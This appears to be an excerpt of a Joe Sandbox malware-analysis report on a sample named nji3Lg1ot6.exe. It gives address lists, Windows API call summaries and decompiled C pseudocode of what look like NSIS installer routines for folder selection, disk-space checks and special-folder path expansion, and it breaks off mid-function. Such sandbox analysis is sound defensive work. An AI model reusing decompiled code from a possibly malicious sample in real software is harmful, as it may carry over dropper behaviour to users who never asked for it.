                      0x00404c24
                      0x00404c26
                      0x00404c29
                      0x00000000
                      0x00000000
                      0x00000000
                      0x00000000
                      0x00404c0c
                      0x00404c0c
                      0x00404c0c
                      0x00404c0f
                      0x00404c12
                      0x00404c14
                      0x00404c14
                      0x00404c14
                      0x00404c15
                      0x00404c16
                      0x00404c16
                      0x00000000
                      0x00404c0c
                      0x00404bef
                      0x00404bd3
                      0x00404b0a
                      0x00404b10
                      0x00000000
                      0x00000000
                      0x00404b1c
                      0x00404b20
                      0x00000000
                      0x00000000
                      0x00404b30
                      0x00404b32
                      0x00404b35
                      0x00000000
                      0x00000000
                      0x00404b47
                      0x00404b49
                      0x00404b4c
                      0x00404b56
                      0x00404b58
                      0x00404b59
                      0x00404b5a
                      0x00404b69
                      0x00404b6b
                      0x00404b72
                      0x00404b75
                      0x00000000
                      0x00404b75
                      0x00404b4e
                      0x00404b51
                      0x00404b54
                      0x00000000
                      0x00000000
                      0x00000000
                      0x00404b54
                      0x00000000
                      0x00404a14
                      0x004047c6
                      0x004047cb
                      0x004047d0
                      0x004047d5
                      0x004047d6
                      0x004047df
                      0x004047ea
                      0x004047f5
                      0x004047fb
                      0x00404809
                      0x0040481e
                      0x00404823
                      0x0040482e
                      0x00404837
                      0x0040484c
                      0x0040485d
                      0x0040486a
                      0x0040486a
                      0x0040486f
                      0x00404875
                      0x00404877
                      0x0040487a
                      0x0040487f
                      0x00404884
                      0x00404886
                      0x00404886
                      0x004048a6
                      0x004048a6
                      0x004048a8
                      0x004048a9
                      0x004048ae
                      0x004048b1
                      0x004048b4
                      0x004048b8
                      0x004048bd
                      0x004048c2
                      0x004048c6
                      0x004048cb
                      0x004048d0
                      0x004048d2
                      0x004048d4
                      0x004048da
                      0x004049a4
                      0x004049b7
                      0x00000000
                      0x004048e0
                      0x004048e3
                      0x004048e6
                      0x004048e9
                      0x004048e9
                      0x004048ef
                      0x004048f5
                      0x004048f8
                      0x004048fe
                      0x004048ff
                      0x00404904
                      0x0040490d
                      0x00404914
                      0x00404917
                      0x0040491a
                      0x0040491d
                      0x00404957
                      0x00404959
                      0x00404982
                      0x0040495b
                      0x00404968
                      0x00404968
                      0x0040491f
                      0x00404922
                      0x00404931
                      0x0040493b
                      0x00404943
                      0x0040494a
                      0x00404952
                      0x00404952
                      0x0040491d
                      0x00404988
                      0x00404989
                      0x0040498f
                      0x00404995
                      0x00404995
                      0x004049a2
                      0x004049bd
                      0x004049c1
                      0x004049de
                      0x004049e3
                      0x004049e6
                      0x004049e6
                      0x00000000
                      0x004049c3
                      0x004049c8
                      0x004049d1
                      0x00404d5e
                      0x00404d70
                      0x00404d70
                      0x004049c1
                      0x00000000
                      0x004049a2
                      0x004048da

                      APIs
                      • GetDlgItem.USER32 ref: 00404789
                      • GetDlgItem.USER32 ref: 00404796
                      • GlobalAlloc.KERNEL32(00000040,00000002), ref: 004047E2
                      • LoadBitmapA.USER32 ref: 004047F5
                      • SetWindowLongA.USER32(?,000000FC,00404D73), ref: 0040480F
                      • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404823
                      • ImageList_AddMasked.COMCTL32(00000000,?,00FF00FF), ref: 00404837
                      • SendMessageA.USER32(?,00001109,00000002), ref: 0040484C
                      • SendMessageA.USER32(?,0000111C,00000000,00000000), ref: 00404858
                      • SendMessageA.USER32(?,0000111B,00000010,00000000), ref: 0040486A
                      • DeleteObject.GDI32(?), ref: 0040486F
                      • SendMessageA.USER32(?,00000143,00000000,00000000), ref: 0040489A
                      • SendMessageA.USER32(?,00000151,00000000,00000000), ref: 004048A6
                      • SendMessageA.USER32(?,00001100,00000000,?), ref: 0040493B
                      • SendMessageA.USER32(?,0000110A,00000003,00000000), ref: 00404966
                      • SendMessageA.USER32(?,00001100,00000000,?), ref: 0040497A
                      • GetWindowLongA.USER32 ref: 004049A9
                      • SetWindowLongA.USER32(?,000000F0,00000000), ref: 004049B7
                      • ShowWindow.USER32(?,00000005), ref: 004049C8
                      • SendMessageA.USER32(?,00000419,00000000,?), ref: 00404ACB
                      • SendMessageA.USER32(?,00000147,00000000,00000000), ref: 00404B30
                      • SendMessageA.USER32(?,00000150,00000000,00000000), ref: 00404B45
                      • SendMessageA.USER32(?,00000420,00000000,00000020), ref: 00404B69
                      • SendMessageA.USER32(?,00000200,00000000,00000000), ref: 00404B8F
                      • ImageList_Destroy.COMCTL32(?), ref: 00404BA4
                      • GlobalFree.KERNEL32 ref: 00404BB4
                      • SendMessageA.USER32(?,0000014E,00000000,00000000), ref: 00404C24
                      • SendMessageA.USER32(?,00001102,00000410,?), ref: 00404CCD
                      • SendMessageA.USER32(?,0000110D,00000000,00000008), ref: 00404CDC
                      • InvalidateRect.USER32(?,00000000,00000001), ref: 00404CFC
                      • ShowWindow.USER32(?,00000000), ref: 00404D4A
                      • GetDlgItem.USER32 ref: 00404D55
                      • ShowWindow.USER32(00000000), ref: 00404D5C
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.295109291.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.295105752.0000000000400000.00000002.00020000.sdmp Download File
                      • Associated: 00000000.00000002.295121992.0000000000407000.00000002.00020000.sdmp Download File
                      • Associated: 00000000.00000002.295133925.0000000000409000.00000004.00020000.sdmp Download File
                      • Associated: 00000000.00000002.295153716.0000000000422000.00000004.00020000.sdmp Download File
                      • Associated: 00000000.00000002.295236745.0000000000429000.00000004.00020000.sdmp Download File
                      • Associated: 00000000.00000002.295242311.000000000042C000.00000002.00020000.sdmp Download File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_nji3Lg1ot6.jbxd
                      Similarity
                      • API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                      • String ID: $M$N$hM
                      • API String ID: 1638840714-3240060286
                      • Opcode ID: 32139a76c024986513f02143e9fc3436abe218e466eac6ee11a08412876e8968
                      • Instruction ID: 2baebcd050ce5e3cc44cfd390f58c160629cefacb8a2130a1722bfbf049ea566
                      • Opcode Fuzzy Hash: 32139a76c024986513f02143e9fc3436abe218e466eac6ee11a08412876e8968
                      • Instruction Fuzzy Hash: 5A02B0B0A00208AFDB24DF55DC45BAE7BB5FB84315F10817AF610BA2E1C7799A42CF58
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 00404275, Relevance: 24.8, APIs: 10, Strings: 4, Instructions: 266stringCOMMON
                      Download Yara Rule
                      C-Code - Quality: 78%
                      			E00404275(struct HWND__* _a4, signed int _a8, unsigned int _a12, intOrPtr _a16) {
				signed int _v8;
				struct HWND__* _v12;
				long _v16;
				long _v20;
				char _v24;
				long _v28;
				char _v32;
				intOrPtr _v36;
				long _v40;
				signed int _v44;
				CHAR* _v52;
				intOrPtr _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				CHAR* _v68;
				void _v72;
				char _v76;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr _t81;
				long _t86;
				signed char* _t88;
				void* _t94;
				signed int _t95;
				signed short _t113;
				signed int _t117;
				char* _t122;
				intOrPtr _t124;
				intOrPtr* _t138;
				signed int* _t145;
				intOrPtr _t147;
				signed int _t148;
				signed int _t153;
				struct HWND__* _t159;
				CHAR* _t162;
				int _t163;

				_t81 =  *0x41fc68; // 0x0
				_v36 = _t81;
				_t162 = ( *(_t81 + 0x3c) << 0xa) + 0x424000;
				_v8 =  *((intOrPtr*)(_t81 + 0x38));
				if(_a8 == 0x40b) {
					E0040532A(0x3fb, _t162);
					E00405CE3(_t162);
				}
				if(_a8 != 0x110) {
					L8:
					if(_a8 != 0x111) {
						L20:
						if(_a8 == 0x40f) {
							L22:
							_v8 = _v8 & 0x00000000;
							_v12 = _v12 & 0x00000000;
							E0040532A(0x3fb, _t162);
							if(E00405659(_t180, _t162) == 0) {
								_v8 = 1;
							}
							E00405A85(0x41f460, _t162);
							_t145 = 0;
							_t86 = E00405DA3(0);
							_v16 = _t86;
							if(_t86 == 0) {
								L31:
								E00405A85(0x41f460, _t162);
								_t88 = E0040560C(0x41f460);
								if(_t88 != _t145) {
									 *_t88 =  *_t88 & 0x00000000;
								}
								if(GetDiskFreeSpaceA(0x41f460,  &_v20,  &_v28,  &_v16,  &_v40) == 0) {
									_t153 = _a8;
									goto L37;
								} else {
									_t163 = 0x400;
									_t153 = MulDiv(_v20 * _v28, _v16, 0x400);
									_v12 = 1;
									goto L38;
								}
							} else {
								if(0 == 0x41f460) {
									L30:
									_t145 = 0;
									goto L31;
								} else {
									goto L26;
								}
								while(1) {
									L26:
									_t113 = _v16(0x41f460,  &_v44,  &_v24,  &_v32);
									if(_t113 != 0) {
										break;
									}
									if(_t145 != 0) {
										 *_t145 =  *_t145 & _t113;
									}
									_t145 = E004055BF(0x41f460) - 1;
									 *_t145 = 0x5c;
									if(_t145 != 0x41f460) {
										continue;
									} else {
										goto L30;
									}
								}
								_t153 = (_v40 << 0x00000020 | _v44) >> 0xa;
								_v12 = 1;
								_t145 = 0;
								L37:
								_t163 = 0x400;
								L38:
								_t94 = E004046C5(5);
								if(_v12 != _t145 && _t153 < _t94) {
									_v8 = 2;
								}
								_t147 =  *0x42367c; // 0x4e3b8b
								if( *((intOrPtr*)(_t147 + 0x10)) != _t145) {
									E00404610(0x3ff, 0xfffffffb, _t94);
									if(_v12 == _t145) {
										SetDlgItemTextA(_a4, _t163, 0x41f450);
									} else {
										E00404610(_t163, 0xfffffffc, _t153);
									}
								}
								_t95 = _v8;
								 *0x423f44 = _t95;
								if(_t95 == _t145) {
									_v8 = E0040140B(7);
								}
								if(( *(_v36 + 0x14) & _t163) != 0) {
									_v8 = _t145;
								}
								E00403E59(0 | _v8 == _t145);
								if(_v8 == _t145 &&  *0x420484 == _t145) {
									E0040420A();
								}
								 *0x420484 = _t145;
								goto L53;
							}
						}
						_t180 = _a8 - 0x405;
						if(_a8 != 0x405) {
							goto L53;
						}
						goto L22;
					}
					_t117 = _a12 & 0x0000ffff;
					if(_t117 != 0x3fb) {
						L12:
						if(_t117 == 0x3e9) {
							_t148 = 7;
							memset( &_v72, 0, _t148 << 2);
							_v76 = _a4;
							_v68 = 0x420498;
							_v56 = E004045AA;
							_v52 = _t162;
							_v64 = E00405AA7(0x3fb, 0x420498, _t162, 0x41f868, _v8);
							_t122 =  &_v76;
							_v60 = 0x41;
							__imp__SHBrowseForFolderA(_t122);
							if(_t122 == 0) {
								_a8 = 0x40f;
							} else {
								__imp__CoTaskMemFree(_t122);
								E00405578(_t162);
								_t124 =  *0x423eb0; // 0x4de368
								_t125 =  *((intOrPtr*)(_t124 + 0x11c));
								if( *((intOrPtr*)(_t124 + 0x11c)) != 0 && _t162 == "C:\\Users\\hardz\\AppData\\Local\\Temp") {
									E00405AA7(0x3fb, 0x420498, _t162, 0, _t125);
									if(lstrcmpiA(0x422e40, 0x420498) != 0) {
										lstrcatA(_t162, 0x422e40);
									}
								}
								 *0x420484 =  &(( *0x420484)[0]);
								SetDlgItemTextA(_a4, 0x3fb, _t162);
							}
						}
						goto L20;
					}
					if(_a12 >> 0x10 != 0x300) {
						goto L53;
					}
					_a8 = 0x40f;
					goto L12;
				} else {
					_t159 = _a4;
					_v12 = GetDlgItem(_t159, 0x3fb);
					if(E004055E5(_t162) != 0 && E0040560C(_t162) == 0) {
						E00405578(_t162);
					}
					 *0x423678 = _t159;
					SetWindowTextA(_v12, _t162);
					_push( *((intOrPtr*)(_a16 + 0x34)));
					_push(1);
					E00403E37(_t159);
					_push( *((intOrPtr*)(_a16 + 0x30)));
					_push(0x14);
					E00403E37(_t159);
					E00403E6C(_v12);
					_t138 = E00405DA3(7);
					if(_t138 == 0) {
						L53:
						return E00403E9E(_a8, _a12, _a16);
					}
					 *_t138(_v12, 1);
					goto L8;
				}
			}








































                      0x0040427b
                      0x00404282
                      0x0040428e
                      0x0040429c
                      0x004042a4
                      0x004042a8
                      0x004042ae
                      0x004042ae
                      0x004042ba
                      0x0040432e
                      0x00404335
                      0x0040440a
                      0x00404411
                      0x00404420
                      0x00404420
                      0x00404424
                      0x0040442a
                      0x00404437
                      0x00404439
                      0x00404439
                      0x00404447
                      0x0040444c
                      0x0040444f
                      0x00404456
                      0x00404459
                      0x00404490
                      0x00404492
                      0x00404498
                      0x0040449f
                      0x004044a1
                      0x004044a1
                      0x004044bd
                      0x004044f9
                      0x00000000
                      0x004044bf
                      0x004044c2
                      0x004044d6
                      0x004044d8
                      0x00000000
                      0x004044d8
                      0x0040445b
                      0x0040445f
                      0x0040448e
                      0x0040448e
                      0x00000000
                      0x00000000
                      0x00000000
                      0x00000000
                      0x00404461
                      0x00404461
                      0x0040446e
                      0x00404473
                      0x00000000
                      0x00000000
                      0x00404477
                      0x00404479
                      0x00404479
                      0x00404484
                      0x00404487
                      0x0040448c
                      0x00000000
                      0x00000000
                      0x00000000
                      0x00000000
                      0x0040448c
                      0x004044e7
                      0x004044ee
                      0x004044f5
                      0x004044fc
                      0x004044fc
                      0x00404501
                      0x00404503
                      0x0040450b
                      0x00404511
                      0x00404511
                      0x00404518
                      0x00404521
                      0x0040452b
                      0x00404533
                      0x00404549
                      0x00404535
                      0x00404539
                      0x00404539
                      0x00404533
                      0x0040454e
                      0x00404553
                      0x00404558
                      0x00404561
                      0x00404561
                      0x0040456a
                      0x0040456c
                      0x0040456c
                      0x00404578
                      0x00404580
                      0x0040458a
                      0x0040458a
                      0x0040458f
                      0x00000000
                      0x0040458f
                      0x00404459
                      0x00404413
                      0x0040441a
                      0x00000000
                      0x00000000
                      0x00000000
                      0x0040441a
                      0x0040433b
                      0x00404341
                      0x0040435b
                      0x00404360
                      0x0040436a
                      0x00404371
                      0x00404380
                      0x00404383
                      0x00404386
                      0x0040438d
                      0x00404395
                      0x00404398
                      0x0040439c
                      0x004043a3
                      0x004043ab
                      0x00404403
                      0x004043ad
                      0x004043ae
                      0x004043b5
                      0x004043ba
                      0x004043bf
                      0x004043c7
                      0x004043d4
                      0x004043e8
                      0x004043ec
                      0x004043ec
                      0x004043e8
                      0x004043f1
                      0x004043fc
                      0x004043fc
                      0x004043ab
                      0x00000000
                      0x00404360
                      0x0040434e
                      0x00000000
                      0x00000000
                      0x00404354
                      0x00000000
                      0x004042bc
                      0x004042bc
                      0x004042c8
                      0x004042d2
                      0x004042df
                      0x004042df
                      0x004042e5
                      0x004042ee
                      0x004042f7
                      0x004042fa
                      0x004042fd
                      0x00404305
                      0x00404308
                      0x0040430b
                      0x00404313
                      0x0040431a
                      0x00404321
                      0x00404595
                      0x004045a7
                      0x004045a7
                      0x0040432c
                      0x00000000
                      0x0040432c

                      APIs
                      • GetDlgItem.USER32 ref: 004042C1
                      • SetWindowTextA.USER32(?,?), ref: 004042EE
                      • SHBrowseForFolderA.SHELL32(?,0041F868,?), ref: 004043A3
                      • CoTaskMemFree.OLE32(00000000), ref: 004043AE
                      • lstrcmpiA.KERNEL32(bxrmcpz,00420498,00000000,?,?), ref: 004043E0
                      • lstrcatA.KERNEL32(?,bxrmcpz), ref: 004043EC
                      • SetDlgItemTextA.USER32 ref: 004043FC
                        • Part of subcall function 0040532A: GetDlgItemTextA.USER32 ref: 0040533D
                        • Part of subcall function 00405CE3: CharNextA.USER32(?,*?|<>/":,00000000,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\nji3Lg1ot6.exe" ,C:\Users\user\AppData\Local\Temp\,00000000,004031FD,C:\Users\user\AppData\Local\Temp\,00000000,0040336F), ref: 00405D3B
                        • Part of subcall function 00405CE3: CharNextA.USER32(?,?,?,00000000), ref: 00405D48
                        • Part of subcall function 00405CE3: CharNextA.USER32(?,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\nji3Lg1ot6.exe" ,C:\Users\user\AppData\Local\Temp\,00000000,004031FD,C:\Users\user\AppData\Local\Temp\,00000000,0040336F), ref: 00405D4D
                        • Part of subcall function 00405CE3: CharPrevA.USER32(?,?,"C:\Users\user\Desktop\nji3Lg1ot6.exe" ,C:\Users\user\AppData\Local\Temp\,00000000,004031FD,C:\Users\user\AppData\Local\Temp\,00000000,0040336F), ref: 00405D5D
                      • GetDiskFreeSpaceA.KERNEL32(0041F460,?,?,0000040F,?,0041F460,0041F460,?,00000000,0041F460,?,?,000003FB,?), ref: 004044B5
                      • MulDiv.KERNEL32(?,0000040F,00000400), ref: 004044D0
                      • SetDlgItemTextA.USER32 ref: 00404549
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.295109291.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.295105752.0000000000400000.00000002.00020000.sdmp Download File
                      • Associated: 00000000.00000002.295121992.0000000000407000.00000002.00020000.sdmp Download File
                      • Associated: 00000000.00000002.295133925.0000000000409000.00000004.00020000.sdmp Download File
                      • Associated: 00000000.00000002.295153716.0000000000422000.00000004.00020000.sdmp Download File
                      • Associated: 00000000.00000002.295236745.0000000000429000.00000004.00020000.sdmp Download File
                      • Associated: 00000000.00000002.295242311.000000000042C000.00000002.00020000.sdmp Download File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_nji3Lg1ot6.jbxd
                      Similarity
                      • API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpi
                      • String ID: A$C:\Users\user\AppData\Local\Temp$bxrmcpz$hM
                      • API String ID: 2246997448-548302372
                      • Opcode ID: 9160f627fd824642e8b844dcf08aeaa1494bcf147798ed7fcce5c5106f52e304
                      • Instruction ID: 6850db0b715ddbe2af210025c5f30c7158fed24285b7178da21f46715b177744
                      • Opcode Fuzzy Hash: 9160f627fd824642e8b844dcf08aeaa1494bcf147798ed7fcce5c5106f52e304
                      • Instruction Fuzzy Hash: BA9162B1A00218BBDF11AFA1DD85AAF77B8EF84314F10403BFB04B6291D77C9A419B59
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 00405AA7, Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 195stringCOMMON
                      Download Yara Rule
                      C-Code - Quality: 74%
                      			E00405AA7(void* __ebx, void* __edi, void* __esi, signed int _a4, signed int _a8) {
				signed int _v8;
				struct _ITEMIDLIST* _v12;
				signed int _v16;
				signed char _v20;
				signed char _v24;
				signed int _v28;
				signed int _t36;
				CHAR* _t37;
				signed char _t39;
				signed int _t40;
				int _t41;
				char _t51;
				char _t52;
				char _t54;
				char _t56;
				void* _t64;
				signed int _t68;
				intOrPtr _t72;
				signed int _t73;
				signed char _t74;
				intOrPtr _t77;
				char _t81;
				void* _t83;
				CHAR* _t84;
				void* _t86;
				signed int _t93;
				signed int _t95;
				void* _t96;

				_t86 = __esi;
				_t83 = __edi;
				_t64 = __ebx;
				_t36 = _a8;
				if(_t36 < 0) {
					_t77 =  *0x42367c; // 0x4e3b8b
					_t36 =  *(_t77 - 4 + _t36 * 4);
				}
				_t72 =  *0x423ed8; // 0x4e2694
				_t73 = _t72 + _t36;
				_t37 = 0x422e40;
				_push(_t64);
				_push(_t86);
				_push(_t83);
				_t84 = 0x422e40;
				if(_a4 - 0x422e40 < 0x800) {
					_t84 = _a4;
					_a4 = _a4 & 0x00000000;
				}
				while(1) {
					_t81 =  *_t73;
					if(_t81 == 0) {
						break;
					}
					__eflags = _t84 - _t37 - 0x400;
					if(_t84 - _t37 >= 0x400) {
						break;
					}
					_t73 = _t73 + 1;
					__eflags = _t81 - 0xfc;
					_a8 = _t73;
					if(__eflags <= 0) {
						if(__eflags != 0) {
							 *_t84 = _t81;
							_t84 =  &(_t84[1]);
							__eflags = _t84;
						} else {
							 *_t84 =  *_t73;
							_t84 =  &(_t84[1]);
							_t73 = _t73 + 1;
						}
						continue;
					}
					_t39 =  *(_t73 + 1);
					_t74 =  *_t73;
					_a8 = _a8 + 2;
					_v20 = _t39;
					_t93 = (_t39 & 0x0000007f) << 0x00000007 | _t74 & 0x0000007f;
					_t68 = _t74;
					_t40 = _t39 | 0x00000080;
					__eflags = _t81 - 0xfe;
					_v28 = _t68;
					_v24 = _t74 | 0x00000080;
					_v16 = _t40;
					if(_t81 != 0xfe) {
						__eflags = _t81 - 0xfd;
						if(_t81 != 0xfd) {
							__eflags = _t81 - 0xff;
							if(_t81 == 0xff) {
								__eflags = (_t40 | 0xffffffff) - _t93;
								E00405AA7(_t68, _t84, _t93, _t84, (_t40 | 0xffffffff) - _t93);
							}
							L41:
							_t41 = lstrlenA(_t84);
							_t73 = _a8;
							_t84 =  &(_t84[_t41]);
							_t37 = 0x422e40;
							continue;
						}
						__eflags = _t93 - 0x1d;
						if(_t93 != 0x1d) {
							__eflags = (_t93 << 0xa) + 0x424000;
							E00405A85(_t84, (_t93 << 0xa) + 0x424000);
						} else {
							E004059E3(_t84,  *0x423ea8);
						}
						__eflags = _t93 + 0xffffffeb - 7;
						if(_t93 + 0xffffffeb < 7) {
							L32:
							E00405CE3(_t84);
						}
						goto L41;
					}
					_t95 = 2;
					_t51 = GetVersion();
					__eflags = _t51;
					if(_t51 >= 0) {
						L12:
						_v8 = 1;
						L13:
						__eflags =  *0x423f24;
						if( *0x423f24 != 0) {
							_t95 = 4;
						}
						__eflags = _t68;
						if(_t68 >= 0) {
							__eflags = _t68 - 0x25;
							if(_t68 != 0x25) {
								__eflags = _t68 - 0x24;
								if(_t68 == 0x24) {
									GetWindowsDirectoryA(_t84, 0x400);
									_t95 = 0;
								}
								while(1) {
									__eflags = _t95;
									if(_t95 == 0) {
										goto L29;
									}
									_t52 =  *0x423ea4; // 0x73e81340
									_t95 = _t95 - 1;
									__eflags = _t52;
									if(_t52 == 0) {
										L25:
										_t54 = SHGetSpecialFolderLocation( *0x423ea8,  *(_t96 + _t95 * 4 - 0x18),  &_v12);
										__eflags = _t54;
										if(_t54 != 0) {
											L27:
											 *_t84 =  *_t84 & 0x00000000;
											__eflags =  *_t84;
											continue;
										}
										__imp__SHGetPathFromIDListA(_v12, _t84);
										__imp__CoTaskMemFree(_v12);
										__eflags = _t54;
										if(_t54 != 0) {
											goto L29;
										}
										goto L27;
									}
									__eflags = _v8;
									if(_v8 == 0) {
										goto L25;
									}
									_t56 =  *_t52( *0x423ea8,  *(_t96 + _t95 * 4 - 0x18), 0, 0, _t84);
									__eflags = _t56;
									if(_t56 == 0) {
										goto L29;
									}
									goto L25;
								}
								goto L29;
							}
							GetSystemDirectoryA(_t84, 0x400);
							goto L29;
						} else {
							_t71 = (_t68 & 0x0000003f) +  *0x423ed8;
							E0040596C(0x80000002, "Software\\Microsoft\\Windows\\CurrentVersion", (_t68 & 0x0000003f) +  *0x423ed8, _t84, _t68 & 0x00000040);
							__eflags =  *_t84;
							if( *_t84 != 0) {
								L30:
								__eflags = _v20 - 0x1a;
								if(_v20 == 0x1a) {
									lstrcatA(_t84, "\\Microsoft\\Internet Explorer\\Quick Launch");
								}
								goto L32;
							}
							E00405AA7(_t71, _t84, _t95, _t84, _v20);
							L29:
							__eflags =  *_t84;
							if( *_t84 == 0) {
								goto L32;
							}
							goto L30;
						}
					}
					__eflags = _t51 - 0x5a04;
					if(_t51 == 0x5a04) {
						goto L12;
					}
					__eflags = _v20 - 0x23;
					if(_v20 == 0x23) {
						goto L12;
					}
					__eflags = _v20 - 0x2e;
					if(_v20 == 0x2e) {
						goto L12;
					} else {
						_v8 = _v8 & 0x00000000;
						goto L13;
					}
				}
				 *_t84 =  *_t84 & 0x00000000;
				if(_a4 == 0) {
					return _t37;
				}
				return E00405A85(_a4, _t37);
			}































                      0x00405aa7
                      0x00405aa7
                      0x00405aa7
                      0x00405aad
                      0x00405ab2
                      0x00405ab4
                      0x00405ac3
                      0x00405ac3
                      0x00405ac5
                      0x00405ace
                      0x00405ad0
                      0x00405ad5
                      0x00405ad8
                      0x00405ad9
                      0x00405ae0
                      0x00405ae2
                      0x00405ae8
                      0x00405aeb
                      0x00405aeb
                      0x00405cc0
                      0x00405cc0
                      0x00405cc4
                      0x00000000
                      0x00000000
                      0x00405af8
                      0x00405afe
                      0x00000000
                      0x00000000
                      0x00405b04
                      0x00405b05
                      0x00405b08
                      0x00405b0b
                      0x00405cb3
                      0x00405cbd
                      0x00405cbf
                      0x00405cbf
                      0x00405cb5
                      0x00405cb7
                      0x00405cb9
                      0x00405cba
                      0x00405cba
                      0x00000000
                      0x00405cb3
                      0x00405b11
                      0x00405b15
                      0x00405b1a
                      0x00405b29
                      0x00405b2c
                      0x00405b2e
                      0x00405b33
                      0x00405b36
                      0x00405b39
                      0x00405b3c
                      0x00405b3f
                      0x00405b42
                      0x00405c5d
                      0x00405c60
                      0x00405c90
                      0x00405c93
                      0x00405c98
                      0x00405c9c
                      0x00405c9c
                      0x00405ca1
                      0x00405ca2
                      0x00405ca7
                      0x00405caa
                      0x00405cac
                      0x00000000
                      0x00405cac
                      0x00405c62
                      0x00405c65
                      0x00405c7a
                      0x00405c81
                      0x00405c67
                      0x00405c6e
                      0x00405c6e
                      0x00405c89
                      0x00405c8c
                      0x00405c55
                      0x00405c56
                      0x00405c56
                      0x00000000
                      0x00405c8c
                      0x00405b4a
                      0x00405b4b
                      0x00405b51
                      0x00405b53
                      0x00405b6d
                      0x00405b6d
                      0x00405b74
                      0x00405b74
                      0x00405b7b
                      0x00405b7f
                      0x00405b7f
                      0x00405b80
                      0x00405b82
                      0x00405bbb
                      0x00405bbe
                      0x00405bce
                      0x00405bd1
                      0x00405bd9
                      0x00405bdf
                      0x00405bdf
                      0x00405c3b
                      0x00405c3b
                      0x00405c3d
                      0x00000000
                      0x00000000
                      0x00405be3
                      0x00405bea
                      0x00405beb
                      0x00405bed
                      0x00405c07
                      0x00405c15
                      0x00405c1b
                      0x00405c1d
                      0x00405c38
                      0x00405c38
                      0x00405c38
                      0x00000000
                      0x00405c38
                      0x00405c23
                      0x00405c2e
                      0x00405c34
                      0x00405c36
                      0x00000000
                      0x00000000
                      0x00000000
                      0x00405c36
                      0x00405bef
                      0x00405bf2
                      0x00000000
                      0x00000000
                      0x00405c01
                      0x00405c03
                      0x00405c05
                      0x00000000
                      0x00000000
                      0x00000000
                      0x00405c05
                      0x00000000
                      0x00405c3b
                      0x00405bc6
                      0x00000000
                      0x00405b84
                      0x00405b89
                      0x00405b9f
                      0x00405ba4
                      0x00405ba7
                      0x00405c44
                      0x00405c44
                      0x00405c48
                      0x00405c50
                      0x00405c50
                      0x00000000
                      0x00405c48
                      0x00405bb1
                      0x00405c3f
                      0x00405c3f
                      0x00405c42
                      0x00000000
                      0x00000000
                      0x00000000
                      0x00405c42
                      0x00405b82
                      0x00405b55
                      0x00405b59
                      0x00000000
                      0x00000000
                      0x00405b5b
                      0x00405b5f
                      0x00000000
                      0x00000000
                      0x00405b61
                      0x00405b65
                      0x00000000
                      0x00405b67
                      0x00405b67
                      0x00000000
                      0x00405b67
                      0x00405b65
                      0x00405cca
                      0x00405cd4
                      0x00405ce0
                      0x00405ce0
                      0x00000000

                      APIs
                      • GetVersion.KERNEL32(00000000,0041FC70,00000000,00404E5B,0041FC70,00000000), ref: 00405B4B
                      • GetSystemDirectoryA.KERNEL32 ref: 00405BC6
                      • GetWindowsDirectoryA.KERNEL32(bxrmcpz,00000400), ref: 00405BD9
                      • SHGetSpecialFolderLocation.SHELL32(?,00000000), ref: 00405C15
                      • SHGetPathFromIDListA.SHELL32(00000000,bxrmcpz), ref: 00405C23
                      • CoTaskMemFree.OLE32(00000000), ref: 00405C2E
                      • lstrcatA.KERNEL32(bxrmcpz,\Microsoft\Internet Explorer\Quick Launch), ref: 00405C50
                      • lstrlenA.KERNEL32(bxrmcpz,00000000,0041FC70,00000000,00404E5B,0041FC70,00000000), ref: 00405CA2
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.295109291.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.295105752.0000000000400000.00000002.00020000.sdmp Download File
                      • Associated: 00000000.00000002.295121992.0000000000407000.00000002.00020000.sdmp Download File
                      • Associated: 00000000.00000002.295133925.0000000000409000.00000004.00020000.sdmp Download File
                      • Associated: 00000000.00000002.295153716.0000000000422000.00000004.00020000.sdmp Download File
                      • Associated: 00000000.00000002.295236745.0000000000429000.00000004.00020000.sdmp Download File
                      • Associated: 00000000.00000002.295242311.000000000042C000.00000002.00020000.sdmp Download File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_nji3Lg1ot6.jbxd
                      Similarity
                      • API ID: Directory$FolderFreeFromListLocationPathSpecialSystemTaskVersionWindowslstrcatlstrlen
                      • String ID: Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch$bxrmcpz
                      • API String ID: 900638850-1794800640
                      • Opcode ID: 8c89faea656f75211a43bdfb02caabddeac7d8c4cf190b1a32756d1be722affe
                      • Instruction ID: 02e69832ec688910c0edf1e4f77165a8fa6b6d990b95ba5e8d1c2d1c59892890
                      • Opcode Fuzzy Hash: 8c89faea656f75211a43bdfb02caabddeac7d8c4cf190b1a32756d1be722affe
                      • Instruction Fuzzy Hash: B251E371A08B19ABEB215B64CC84BBF3B74EB15714F14023BE911BA2D0D37C5982DE4E
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 00402012, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 134comCOMMON
                      Download Yara Rule
                      C-Code - Quality: 74%
                      			E00402012() {
				void* _t44;
				intOrPtr* _t48;
				intOrPtr* _t50;
				intOrPtr* _t52;
				intOrPtr* _t54;
				signed int _t58;
				intOrPtr* _t59;
				intOrPtr* _t62;
				intOrPtr* _t64;
				intOrPtr* _t66;
				intOrPtr* _t69;
				intOrPtr* _t71;
				int _t75;
